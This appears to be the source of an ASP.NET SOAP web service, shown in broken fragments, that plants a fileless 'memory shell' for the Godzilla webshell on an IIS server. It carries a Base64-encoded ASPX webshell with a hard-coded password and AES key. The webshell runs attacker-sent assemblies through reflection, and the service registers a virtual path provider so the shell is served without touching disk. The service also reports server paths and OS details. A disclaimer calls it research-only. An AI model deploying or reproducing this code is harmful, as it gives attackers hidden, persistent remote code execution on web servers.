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WebService Language="C#" Class="dotNetMatrix.Sharp4SoapWebShell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Services.Protoc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iagno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dotN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ttributeUsage(AttributeTargets.Metho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class Sharp4SoapShellAttribute:SoapExtension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int _prio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harp4SoapShellAttrib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priorit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webshellContentsBase64 = "PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiU+PCV0cnkgeyBzdHJpbmcga2V5ID0gIjNjNmUwYjhhOWMxNTIyNGEiOyBzdHJpbmcgcGFzcyA9ICJkb3RuZXQwMDEiOyBzdHJpbmcgbWQ1ID0gU3lzdGVtLkJpdENvbnZlcnRlci5Ub1N0cmluZyhuZXcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5NRDVDcnlwdG9TZXJ2aWNlUHJvdmlkZXIoKS5Db21wdXRlSGFzaChTeXN0ZW0uVGV4dC5FbmNvZGluZy5EZWZhdWx0LkdldEJ5dGVzKHBhc3MgKyBrZXkpKSkuUmVwbGFjZSgiLSIsICIiKTsgYnl0ZVtdIGRhdGEgPSBTeXN0ZW0uQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKENvbnRleHQuUmVxdWVzdFtwYXNzXSk7IGRhdGEgPSBuZXcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5SaWpuZGFlbE1hbmFnZWQoKS5DcmVhdGVEZWNyeXB0b3IoU3lzdGVtLlRleHQuRW5jb2RpbmcuRGVmYXVsdC5HZXRCeXRlcyhrZXkpLCBTeXN0ZW0uVGV4dC5FbmNvZGluZy5EZWZhdWx0LkdldEJ5dGVzKGtleSkpLlRyYW5zZm9ybUZpbmFsQmxvY2soZGF0YSwgMCwgZGF0YS5MZW5ndGgpOyBpZiAoQ29udGV4dC5TZXNzaW9uWyJwYXlsb2FkIl0gPT0gbnVsbCkgeyBDb250ZXh0LlNlc3Npb25bInBheWxvYWQiXSA9IChTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSl0eXBlb2YoU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkpLkdldE1ldGhvZCgiTG9hZCIsIG5ldyBTeXN0ZW0uVHlwZVtdIHsgdHlwZW9mKGJ5dGVbXSkgfSkuSW52b2tlKG51bGwsIG5ldyBvYmplY3RbXSB7IGRhdGEgfSk7IDsgfSBlbHNlIHsgU3lzdGVtLklPLk1lbW9yeVN0cmVhbSBvdXRTdHJlYW0gPSBuZXcgU3lzdGVtLklPLk1lbW9yeVN0cmVhbSgpOyBvYmplY3QgbyA9ICgoU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkpQ29udGV4dC5TZXNzaW9uWyJwYXlsb2FkIl0pLkNyZWF0ZUluc3RhbmNlKCJMWSIpOyBvLkVxdWFscyhDb250ZXh0KTsgby5FcXVhbHMob3V0U3RyZWFtKTsgby5FcXVhbHMoZGF0YSk7IG8uVG9TdHJpbmcoKTsgYnl0ZVtdIHIgPSBvdXRTdHJlYW0uVG9BcnJheSgpOyBDb250ZXh0LlJlc3BvbnNlLldyaXRlKG1kNS5TdWJzdHJpbmcoMCwgMTYpKTsgQ29udGV4dC5SZXNwb25zZS5Xcml0ZShTeXN0ZW0uQ29udmVydC5Ub0Jhc2U2NFN0cmluZyhuZXcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5SaWpuZGFlbE1hbmFnZWQoKS5DcmVhdGVFbmNyeXB0b3IoU3lzdGVtLlRleHQuRW5jb2RpbmcuRGVmYXVsdC5HZXRCeXRlcyhrZXkpLCBTeXN0ZW0uVGV4dC5FbmNvZGluZy5EZWZhdWx0LkdldEJ5dGVzKGtleSkpLlRyYW5zZm9ybUZpbmFsQmxvY2sociwgMCwgci5MZW5ndGgpKSk7IENvbnRleHQuUmVzcG9uc2UuV3JpdGUobWQ1LlN1YnN0cmluZygxNikpOyB9IH0gY2F0Y2ggKFN5c3RlbS5FeGNlcHRpb24pIHsgfQolPg==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webshellType = ".as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webshellContent = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(webshellContentsBase6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rootPath = System.Web.HttpContext.Current.Request.CurrentExecutionFilePath.TrimEnd('/').ToLow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 index = rootPath.IndexOf(System.Web.HttpContext.Current.Request.ApplicationPath.ToLower()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ndex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tPath = rootPath.Remove(index, System.Web.HttpContext.Current.Request.ApplicationPath.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prefix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ootPath.LastIndexOf("/"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= rootPath.Substring(0, rootPath.LastIndexOf("/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targetVirtualPath = prefix + "/dotNetMatrix/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VirtualPath = targetVirtualPath.Replace("//", "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PathProvider sampleProvider = new SamplePathProvider(targetVirtualPath, webshell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Web.Hosting.HostingEnvironment.RegisterVirtualPathProvider(sampleProvi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Web.HttpContext.Current.Response.Write("&lt;pre style='text-align: center;font-weight: Bold;'&gt; Soap Memory Shell For Godzllia &lt;/pre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Web.HttpContext.Current.Response.Write("&lt;pre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Web.HttpContext.Current.Response.Write("1. Memory Shell Path: " + targetVirtualPath + "Godzllia.aspx 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Web.HttpContext.Current.Response.Write("2. WebSite ApplicationPath: " +  System.Web.HttpContext.Current.Server.MapPath(System.Web.HttpContext.Current.Request.ApplicationPath) + "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Web.HttpContext.Current.Response.Write("3. dotNet FrameWork Version: " + System.Environment.Version + "\r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Web.HttpContext.Current.Response.Write("4. Windows OSVersion: " + System.Environment.OSVersion + "\r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Web.HttpContext.Current.Response.Write("5. Just for Research, Do Not Abuse It! Author: dotNet Security Matrix Team  \r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Web.HttpContext.Current.Response.Write("&lt;/pre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Web.HttpContext.Current.Response.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verride Type Extensio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return typeof(Object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verride in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{ return _priorit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{_priority = va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class SamplePathProvider : System.Web.Hosting.VirtualPath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tring _virtual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tring _fileCont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amplePathProvider(string virtualDir, string file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virtualDir = "/" + virtualDir.Replace(@"\", "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virtualDir = _virtualDir.Replace("//", "/").TrimEnd('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fileContent = file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override void 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bool IsPathVirtual(string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String checkPath = System.Web.VirtualPathUtility.ToAppRelative(virtual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turn checkPath.ToLower().Contains(_virtualDir.ToLower(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verride bool FileExists(string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sPathVirtual(virtual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Previous.FileExists(virtual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verride bool DirectoryExists(string virtual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sPathVirtual(virtualDi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Previous.DirectoryExists(virtual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verride System.Web.Hosting.VirtualFile GetFile(string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sPathVirtual(virtual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new SampleVirtualFile(virtualPath, _file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Previous.GetFile(virtual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verride System.Web.Hosting.VirtualDirectory GetDirectory(string virtual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sPathVirtual(virtualDi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new SampleVirtualDirectory(virtual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Previous.GetDirectory(virtual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verride System.Web.Caching.CacheDependency GetCacheDependenc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virtual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Collections.IEnumerable virtualPathDepend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DateTime utc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sPathVirtual(virtual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new System.Web.Caching.CacheDependency(@"c:\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Previous.GetCacheDependency(virtualPath, virtualPathDependencies, utcSta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class SampleVirtualFile : System.Web.Hosting.Virtua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tring _file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bool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tru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ampleVirtualFile(string virtualPath, string file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base(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_fileContent = file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verride System.IO.Stream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IO.Stream stream = new System.IO.MemoryStream(System.Text.Encoding.UTF8.GetBytes(_fileConte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class SampleVirtualDirectory : System.Web.Hosting.Virtual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ampleVirtualDirectory(string virtual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base(virtual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path = virtual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ystem.Web.HttpContext.Current.Request.ApplicationPath !=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ndex = virtualDir.IndexOf(System.Web.HttpContext.Current.Request.ApplicationPath.ToLowe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index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= virtualDir.Remove(index, System.Web.HttpContext.Current.Request.ApplicationPath.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= path.TrimEnd('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string.IsNullOrEmpty(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ldren.Add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.Add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VirtualFile svf = new SampleVirtualFile(path + "/ghostfile.aspx"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ldren.Add(sv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Add(sv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ystem.Collections.ArrayList children = new System.Collections.Array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verride System.Collections.IEnumerabl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childre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ystem.Collections.ArrayList directories = new System.Collections.Array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verride System.Collections.IEnumerab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directorie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ystem.Collections.ArrayList files = new System.Collections.Array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verride System.Collections.IEnumer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file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ebService(Namespace = "http://tempuri.org/"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ebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1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ystem.ComponentModel.ToolboxItem(fals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class Sharp4SoapWebShell : System.Web.Services.Web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eb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tNetMatrix.Sharp4SoapShell(Priority = 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ring HelloWor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